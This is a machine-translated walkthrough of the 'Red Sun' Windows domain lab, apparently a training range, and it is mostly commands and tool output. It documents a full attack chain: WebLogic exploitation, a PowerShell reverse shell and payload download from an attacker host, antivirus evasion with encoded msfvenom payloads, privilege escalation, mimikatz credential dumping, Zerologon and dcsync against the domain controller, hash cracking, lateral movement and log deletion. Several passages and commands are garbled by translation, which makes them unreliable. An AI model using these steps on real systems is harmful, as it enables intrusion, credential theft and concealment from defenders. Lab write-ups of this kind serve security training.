Red Sun Target II
Environment Setup
Simply put the virtual machine'shost-only(host only) NIC to10.10.10.0 segment, configured as follows
particle marking the following noun as a direct objectNAT NIC, change to192.168.96.0 network segments, as follows
First revert to v1.3 snapshots
Let and then click abandon, abandon and then boot up with another user.\de1ay:1qaz@WSX Credentials login, password expired change the password to log in successfully
When finished, turn on the WebLogic service in the WEB server.
C:\Oracle\Middleware\user_projects\domains\base_domain\bin
Run as administrator
The setup is complete. Let's log in to kali.
I. nmap scanning
1) Host discovery
sudo nmap -sn -o hosts 192.168.111.0/24
MAC Address: 00:50:56:FA:CB:D3 (VMware)
Nmap scan report for 192.168.111.80
Host is up (0.00013s latency).
MAC Address: 00:0C:29:BE:34:8C (VMware)
Nmap scan report for 192.168.111.201
see that192.168.111.201 cap (a poem)192.168.111.80 For newly added ip
2) Port Discovery
192.168.111.80
sudo nmap -sT --min-rate 10000 -p- 192.168.111.80 -o 80_ports
Starting Nmap 7.93 ( ) at 2024-09-24 16:09 CST
Nmap scan report for 192.168.111.80
Host is up (0.00040s latency).
Not shown: 65522 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
3389/tcp open ms-wbt-server
7001/tcp open afs3-callback
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49175/tcp open unknown
49261/tcp open unknown
60966/tcp open unknown
MAC Address: 00:0C:29:BE:34:8C (VMware)
Nmap done: 1 IP address (1 host up) scanned in 20.04 seconds
192.168.111.201
sudo nmap -sT --min-rate 10000 -p- 192.168.111.201 -o 201_ports
Starting Nmap 7.93 ( ) at 2024-09-24 16:04 CST
Nmap scan report for 192.168.111.201
Host is up (0.00045s latency).
Not shown: 65526 filtered tcp ports (no-response)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49178/tcp open unknown
MAC Address: 00:0C:29:84:B4:3E (VMware)
Nmap done: 1 IP address (1 host up) scanned in 13.44 seconds
see that192.168.111.80 machine had ports 80 and 7001 open, which was obviously interesting to us because the attack surface for the web is broad, and also because 7001 is the default port for webLogic. We conducted an analysis of the192.168.111.80 Perform detailed information scanning
3) Detailed information scanning
First we process the open ports to speed up the speed and accuracy of the scans
Copy open ports to the ports variable
ports=$(cat 80_ports | grep open | awk -F/ '{print $1}' | paste -sd ,)
Pressing the tab key after typing $ports completes the list.
sudo nmap -sT -sV -sC -O -p$ports 192.168.111.80 -o details
# Nmap 7.93 scan initiated Tue Sep 24 16:18:25 2024 as: nmap -sT -sV -sC -O -p80,135,139,445,1433,3389,7001,49152,49153,49154,49175,49261,60966 -o details 192.168.111.80
Nmap scan report for 192.168.111.80
Host is up (0.00080s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Site doesn't have a title.
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2008 R2 10.50.4000.00; SP2
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-09-24T07:53:06
|_Not valid after: 2054-09-24T07:53:06
|_ssl-date: 2024-09-24T08:20:30+00:00; 0s from scanner time.
| ms-sql-ntlm-info:
| 192.168.111.80:1433:
| Target_Name: DE1AY
| NetBIOS_Domain_Name: DE1AY
| NetBIOS_Computer_Name: WEB
| DNS_Domain_Name:
| DNS_Computer_Name: WEB.
| DNS_Tree_Name:
|_ Product_Version: 6.1.7601
| ms-sql-info:
| 192.168.111.80:1433:
| Version:
| name: Microsoft SQL Server 2008 R2 SP2
| number: 10.50.4000.00
| Product: Microsoft SQL Server 2008 R2
| Service pack level: SP2
| Post-SP patches applied: false
|_ TCP port: 1433
3389/tcp open ms-wbt-server?
| ssl-cert: Subject: commonName=WEB.
| Not valid before: 2024-09-23T07:46:09
|_Not valid after: 2025-03-25T07:46:09
| rdp-ntlm-info:
| Target_Name: DE1AY
| NetBIOS_Domain_Name: DE1AY
| NetBIOS_Computer_Name: WEB
| DNS_Domain_Name:
| DNS_Computer_Name: WEB.
| DNS_Tree_Name:
| Product_Version: 6.1.7601
|_ System_Time: 2024-09-24T08:19:51+00:00
|_ssl-date: 2024-09-24T08:20:30+00:00; 0s from scanner time.
7001/tcp open http Oracle WebLogic Server 10.3.6.0 (Servlet 2.5; JSP 2.1; T3 enabled)
|_http-title: Error 404--Not Found
|_weblogic-t3-info: T3 protocol in use (WebLogic version: 10.3.6.0)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49175/tcp open msrpc Microsoft Windows RPC
49261/tcp open msrpc Microsoft Windows RPC
60966/tcp open ms-sql-s Microsoft SQL Server 2008 R2 10.50.4000.00; SP2
| ms-sql-ntlm-info:
| 192.168.111.80:60966:
| Target_Name: DE1AY
| NetBIOS_Domain_Name: DE1AY
| NetBIOS_Computer_Name: WEB
| DNS_Domain_Name:
| DNS_Computer_Name: WEB.
| DNS_Tree_Name:
|_ Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-09-24T07:53:06
|_Not valid after: 2054-09-24T07:53:06
| ms-sql-info:
| 192.168.111.80:60966:
| Version:
| name: Microsoft SQL Server 2008 R2 SP2
| number: 10.50.4000.00
| Product: Microsoft SQL Server 2008 R2
| Service pack level: SP2
| Post-SP patches applied: false
|_ TCP port: 60966
|_ssl-date: 2024-09-24T08:20:30+00:00; 0s from scanner time.
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at /cgi-bin/?new-service :
SF-Port3389-TCP:V=7.93%I=7%D=9/24%Time=66F275DE%P=x86_64-pc-linux-gnu%r(Te
SF:rminalServerCookie,13,"\x03\0\0\x13\x0e\xd0\0\0\x124\0\x02\x01\x08\0\x0
SF:2\0\0\0");
MAC Address: 00:0C:29:BE:34:8C (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows 7
OS CPE: cpe:/o:microsoft:windows_7
OS details: Microsoft Windows 7
Network Distance: 1 hop
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-os-discovery:
| OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
| Computer name: WEB
| NetBIOS computer name: WEB\x00
| Domain name:
| Forest name:
| FQDN: WEB.
|_ System time: 2024-09-24T16:19:55+08:00
|_clock-skew: mean: -53m19s, deviation: 2h39m58s, median: 0s
| smb2-security-mode:
| 210:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2024-09-24T08:19:54
|_ start_date: 2024-09-24T07:53:08
OS and Service detection performed. Please report any incorrect results at /submit/ .
# Nmap done at Tue Sep 24 16:20:30 2024 -- 1 IP address (1 host up) scanned in 124.83 seconds
I see that 7001 is the Weblogic service.
II. Web Penetration
Open 80 Pages
It's a blank page. We'll have to give up on 80.
Open port 7001
Seeing that there is content, we visit Weblogic's default login page
http://192.168.111.80:7001/console/login/
The bottom left corner reveals the version of Weblogic10.3.6.0
Scan the attack enumeration with weblogicScanner.
git clone /0xn0ne/
cd weblogicScanner
python -t 192.168.111.80:7001
[20:35:09][INFO] [!][CVE-2019-2890][192.168.111.80:7001] Connection error.
[20:35:09][INFO] [!][CVE-2017-3248][192.168.111.80:7001] Connection error.
[20:35:09][INFO] [-][CVE-2017-3248][192.168.111.80:7001] Not vulnerability.
[20:35:09][INFO] [-][CVE-2019-2890][192.168.111.80:7001] Not vulnerability.
[20:35:10][INFO] [+][CVE-2019-2618][192.168.111.80:7001] Found module, Please verify manually!
[20:35:10][INFO] [+][CVE-2017-3506][192.168.111.80:7001] Exists vulnerability!
[20:35:11][INFO] [!][CVE-2018-2893][192.168.111.80:7001] Connection error.
[20:35:11][INFO] [!][CVE-2018-2628][192.168.111.80:7001] Connection error.
[20:35:11][INFO] [-][CVE-2018-2628][192.168.111.80:7001] Not vulnerability.
[20:35:11][INFO] [-][CVE-2018-2893][192.168.111.80:7001] Not vulnerability.
[20:35:12][INFO] [!][CVE-2020-14882][192.168.111.80:7001] Connection error.
[20:35:12][INFO] [-][CVE-2020-14882][192.168.111.80:7001] Not vulnerability.
[20:35:13][INFO] [-][CVE-2017-10271][192.168.111.80:7001] Not vulnerability.
[20:35:14][INFO] [+][CVE-2019-2888][192.168.111.80:7001] Found module, Please verify manually!
[20:35:15][INFO] [+][CVE-2019-2725][192.168.111.80:7001] Exists vulnerability!
[20:35:19][INFO] [-][CVE-2020-2883][192.168.111.80:7001] Not vulnerability.
[20:35:19][INFO] [-][CVE-2018-3191][192.168.111.80:7001] Not vulnerability.
[20:35:20][INFO] [-][CVE-2020-2555][192.168.111.80:7001] Not vulnerability.
[20:35:21][INFO] [!][CVE-2020-2551][192.168.111.80:7001] Connection error.
[20:35:21][INFO] [-][CVE-2020-2551][192.168.111.80:7001] Not found.
[20:35:23][INFO] [+][CVE-2014-4210][192.168.111.80:7001] Found module, Please verify manually!
[20:35:24][INFO] [+][CVE-2016-3510][192.168.111.80:7001] Exists vulnerability!
[20:35:24][INFO] [-][CVE-2016-0638][192.168.111.80:7001] Not vulnerability.
[20:35:24][INFO] [+][CVE-2020-14750][192.168.111.80:7001] Exists vulnerability!
[20:35:25][INFO] [+][CVE-2018-3245][192.168.111.80:7001] Exists vulnerability!
[20:35:27][INFO] [-][CVE-2019-2729][192.168.111.80:7001] Not vulnerability.
[20:35:30][INFO] [-][Weblogic Console][192.168.111.80:7001] Not found.
[20:35:30][INFO] [-][CVE-2018-2894][192.168.111.80:7001] Not found.
[20:35:30][INFO] [-][CVE-2020-14883][192.168.111.80:7001] Not vulnerability.
[20:35:32][INFO] [-][CVE-2018-3252][192.168.111.80:7001] Not found.
Run completed, 30 seconds total.
Filter the results.
cat | grep + | sed -e 's/\[//g' | sed 's/\]/ /g'|awk '{print $4" " $6" " $7}'
CVE-2019-2618 Found module,
CVE-2017-3506 Exists vulnerability!
CVE-2019-2888 Found module,
CVE-2019-2725 Exists vulnerability!
CVE-2014-4210 Found module,
CVE-2016-3510 Exists vulnerability!
CVE-2020-14750 Exists vulnerability!
CVE-2018-3245 Exists vulnerability!
Seeing that there are 8 that may exist or have been verified to exist, there's not much we can do, we have to try them one by one.
python url username password
See Authentication information is required, and we definitely prioritize vulnerabilities that are conditional
Trying CVE-2017-3506 found to be successful
github address:/Al1ex/CVE-2017-3506
Open link
See username web\de1ay
III. Gaining a foothold
Rebound shell
powershell -nop -c "$client = New-Object ('192.168.111.10', 4444);$stream = $();[byte[]]$bytes = 0..65535|%{0};while(($i = $($bytes, 0, $)) -ne 0){;$data = (New-Object -TypeName ).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([]::ASCII).GetBytes($sendback2);$($sendbyte,0,$);$()};$()"
url encoding
powershell%20-nop%20-c%20%22%24client%20%3D%20New-Object%('192.168.111.10'%2C%204444)%3B%24stream%20%3D%20%()%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile((%24i%20%3D%20%(%24bytes%2C%200%2C%20%))%20-ne%200)%7B%3B%24data%20%3D%20(New-Object%20-TypeName%).GetString(%24bytes%2C0%2C%20%24i)%3B%24sendback%20%3D%20(iex%20%24data%202%3E%261%20%7C%20Out-String%20)%3B%24sendback2%20%20%3D%20%24sendback%20%2B%20'PS%20'%20%2B%20(pwd).Path%20%2B%20'%3E%20'%3B%24sendbyte%20%3D%20(%%5D%3A%3AASCII).GetBytes(%24sendback2)%3B%(%24sendbyte%2C0%2C%)%3B%()%7D%3B%()%22
Successful bounce to kali
fulfillment
tasklist /svc
I can see the process of 360, it should be installed 360 antivirus software.
IV. No-kill confrontation
1) Go online cs
Generate cs * Horse Free
We're going to use the bypassAV plugin to make the *s that come online to cs immune.
baypassAV:/hack2fun/BypassAV
Because this is the target machine environment and virtual environment, resulting in 360 antivirus has some of the functions of the defect. We used the cs plugin to do the primary free kill can pass. This is for reference only.
git clone /hack2fun/
Importing it in cs file
Imported successfully
Generate a no-kill program with bypassAV
Select a listener for cs
kali start python web service
python -m
Get the bounce shell to execute the
powershell iex(new-object ).downloadfile('http://192.168.111.10:8000/','c:\programdata\')
Simple explanation: Execute string commands via iex (Invoke-Expression), send http requests with webclient, download files to the programdata directory on the machine.
Seeing that the request was successful, but our shell is dead, let's terminate the shell and bounce it again
Saw the * we uploaded.
(of a computer) run
.\
Successfully online to cs
2) Go online msf
a) Direct transfer (failed)
Migrating cs sessions to msf
On msf
use exploit/multi/handler
msf6 exploit(multi/handler) > set Lhost 192.168.111.10
Lhost => 192.168.111.10
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.111.10:4444
On cs
Add a foregin listener
Right click and select spawn
Select the foregin listener you just created
I see it's failing. I think it's being blocked by 360.
b) msf obfuscation (success)
Look at the encoder.
msfvenom -l encoder | grep x64
x64/xor normal XOR Encoder
x64/xor_context normal Hostname-based Context Keyed Payload Encoder
x64/xor_dynamic normal Dynamic key XOR Encoder
x64/zutto_dekiru manual Zutto Dekiru
Generate a msf * horse and make it uninstallable.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.111.10 LPORT=4444 -e x64/xor_dynamic -f exe -o
Simple obfuscation with msf's parameters, it's the target machine, he's just an abstraction of the real environment, it's impossible to say that you're going to go and spend a long time and make a real no-kill
upload
Here, the port of the bounce shell conflicts with the listening port of the msf *, so I switched to the listening port of nc.
fulfillment
Successfully acquired meterpreter
v. power of attorney
1) cs uplift authority
cs on the relatively simple, the direct use of legend (tawu) plug-ins, the elevation of authority module can be completed to raise the right.
One by one, click toMS-14-058 Successful authorization at the time of
2)msf raise the right to speak
msf, it's a little more tedious to lift rights.
View the authorization module in msf
search platform:windows type:exploit local
Seeing a lot of boosted exp, it's a test of our experience with boosted exp selection
Below is a list of common lifting vulnerabilities that we can try, whether successful or not, and I'll label them as well
a) getsystem (failure)
Get the meterpreter. Definitely trying getsystem now.
No authorization was granted.
b) ms16_032 (failed)
secondary_logon_handle_privesc :: A vulnerability that exploits the Windows Secondary Logon service.
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > use windows/local/ms16_032_secondary_logon_handle_privesc
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set session 6
session => 6
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > run
[*] Started reverse TCP handler on 192.168.111.10:4444
[+] Compressed size: 1160
[-] Exploit aborted due to failure: not-vulnerable: Target is not vulnerable
[+] Deleted
[*] Exploit completed, but no session was created.
c) ms14_058 (success)
ms14_058_track_popup_menu: Exploits a CVE-2014-6324 vulnerability in Windows. The vulnerability could allow an attacker to elevate privileges to the administrator level in a user session with least privileges.
There is a reproduction of the connection here, so the session id changed
use windows/local/ms14_058_track_popup_menu
msf6 exploit(windows/local/ms14_058_track_popup_menu) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms14_058_track_popup_menu) > set target 1
target => 1
msf6 exploit(windows/local/ms14_058_track_popup_menu) >set session 2
session => 2
msf6 exploit(windows/local/ms14_058_track_popup_menu) > run
[*] Started reverse TCP handler on 192.168.111.10:4444
[*] Reflectively injecting the exploit DLL and triggering the exploit...
[*] Launching msiexec to host the DLL...
[+] Process 4672 launched.
[*] Reflectively injecting the DLL into 4672...
[*] Sending stage (201798 bytes) to 192.168.111.80
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 3 opened (192.168.111.10:4444 -> 192.168.111.80:63084) at 2024-09-26 15:09:59 +0800
meterpreter >
I see the authorization was successful.
d) bypassuac (failure)
There are many more ways to do this, so try it yourself if you're interested
VI. Horizontal penetration
1) Domain Control Discovery
Run mimikatz
Voucher seen.de1ay:hongrisec@2024,mssql:1qaz@WSX
Discovering hosts with portscan
See surviving hosts10.10.10.10,10.10.10.201two-unit
Also scanned, some of the ports they have open.
10.10.10.201:3389
[+] received output:
10.10.10.201:139
10.10.10.201:135
10.10.10.10:5985
[+] received output:
10.10.10.10:3389
[+] received output:
10.10.10.10:636
10.10.10.10:593
[+] received output:
10.10.10.10:464
[+] received output:
10.10.10.10:389
[+] received output:
10.10.10.10:139
10.10.10.10:135
[+] received output:
10.10.10.10:88
[+] received output:
10.10.10.10:53
[+] received output:
10.10.10.10:445
10.10.10.201:445
It can be used in cs's beaconping -ato see what the host's domain name says
shell ping -a -n 1 10.10.10.10
shell ping -a -n 1 10.10.10.201
see that10.10.10.10name is DC, the probability is that he is the domain control host
(indicates contrast)10.10.10.201The request timed out. We can't identify it yet.
2) Detecting vulnerabilities
Detecting zerologon vulnerabilities in domain-controlled hosts
A brief introduction to zerologon:
No. CVE-2020-1427, which refers to the use of theNetLogonWhen the secure channel is connected to the domain control, due to the flaws in the encryption part of the authentication protocol, the attacker can set the password of the domain control administrator user to be empty, so as to further realize the acquisition of the password hash and ultimately completely control the domain control host.
The NetLogon component is an important functional component on Windows that is used to authenticate users and machines on a domain-controlled network, replicate databases for domain-controlled backups, and maintain relationships between domain members and domains, between domains and domain controls, and between domain DCs and cross-domain DCs
Execute in the beacon of the cs
mimikatz lsadump::zerologon /target:DC. /account:DC$
beacon> mimikatz lsadump::zerologon /target:DC. /account:DC$
[*] Tasked beacon to run mimikatz's lsadump::zerologon /target:DC. /account:DC$ command
[+] host called home, sent: 750708 bytes
[+] received output:
Remote : DC.
ProtSeq : ncacn_ip_tcp
AuthnSvc : NONE
NULL Sess: no
Target : DC.
Account: DC$
Type : 6 (Server)
Mode : detect
Trying to 'authenticate'...
================================================================
NetrServerAuthenticate2: 0x00000000
* Authentication: OK -- vulnerable
see that there iszerologonloophole
3) Exploitation of vulnerabilities
mimikatz lsadump::zerologon /target:DC. /account:DC$ /exploit
[*] Tasked beacon to run mimikatz's lsadump::zerologon /target:DC. /account:DC$ /exploit command
[+] host called home, sent: 750708 bytes
[+] received output:
Remote : DC.
ProtSeq : ncacn_ip_tcp
AuthnSvc : NONE
NULL Sess: no
Target : DC.
Account: DC$
Type : 6 (Server)
Mode : exploit
Trying to 'authenticate'...
==============================================================================================
NetrServerAuthenticate2: 0x00000000
NetrServerPasswordSet2 : 0x00000000
* Authentication: OK -- vulnerable
* Set password : OK -- may be unstable
see thatSet password : OK
propose sth (for the first time)dcsyncAttack to get domain control user hash
mimikatz lsadump::dcsync /domain: /dc:DC. /user:administrator /authuser:DC$ /authdomain:de1ay /authpassword:"" /authntlm
[+] host called home, sent: 750705 bytes
[+] received output:
[DC] '' will be the domain
[DC] 'DC.' will be the DC server
[DC] 'administrator' will be the user account
[AUTH] Username: DC$
[AUTH] Domain : de1ay
[AUTH] Password:
[AUTH] Explicit NTLM Mode
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000200 ( NORMAL_ACCOUNT )
Account expiration : 1601/1/1 8:00:00
Password last change : 2019/9/9 10:40:33
Object Security ID : S-1-5-21-2756371121-2868759905-3853650604-500
Object Relative ID : 500
Credentials:
Hash NTLM: 161cff084477fe596a5db81874498a24
see thatHash NTLM: 161cff084477fe596a5db81874498a24This is the administrator's hash
Let's take it to kali and crack it.
hashcat creds /usr/share/wordlists/ -m 1000
See the voucher information:
administrator:1qaz@WSX
Add to cs
Open credentials, click add
Add Completed
4) Lateral movement
a) Domain control
Add listener on 192.168.111.80
Named DC
Go to the target and select Domain Control
Select the credentials and listeners you just added
See domain control go live successfully
I see that it's the domain controller's system privileges.
b) Other machines
Once you've gained domain control access to the remaining one, just psexec-jump directly
session selects the domain-controlled
see that10.10.10.201The system user has come online to the
VII. Maintenance of competence
I've done a summary of this operation in a previous post, see my article for details
Summary of Windows Privilege Maintenance
This can of course also be done using the cs plugin
VIII. Trace clearance
The main thing is to delete the logs we generated during the attack and the files we uploaded for the infiltration to go through.
In the cs plugin it is possible to delete the system's duty day
summarize
- Scanning through nmap revealed the addresses of the two target machines, did a port scan on each, and found that the machine 192.168.111.80 had ports 80 and 7001 open, while the other one did not. There is no doubt that we should definitely prioritize the penetration of the 80 machine ahead of time.
- By accessing ports 80 and 7001, we found that 7001 is the default weblogic service, and using the weblogicscan vulnerability enumeration tool we found that it may have many versions of vulnerabilities, we tried one by one, and finally obtained the shell of the web machine
- After getting the permission of the web machine, I found that it has 360 antivirus software turned on in the process, and after a simple no-kill of the * horse file generated by cs (msf), I successfully went online cs (msf)
- The system has been successfully authorized by using the authorization module of the Integration Framework.
- Running the zerologon module of mimikatz detected the vulnerability in the domain control host, and utilized zerlogon to successfully move laterally to the domain control host and gain system privileges of the domain control. Using the credentials of the domain controller, we also gained system privileges on other hosts in the domain.
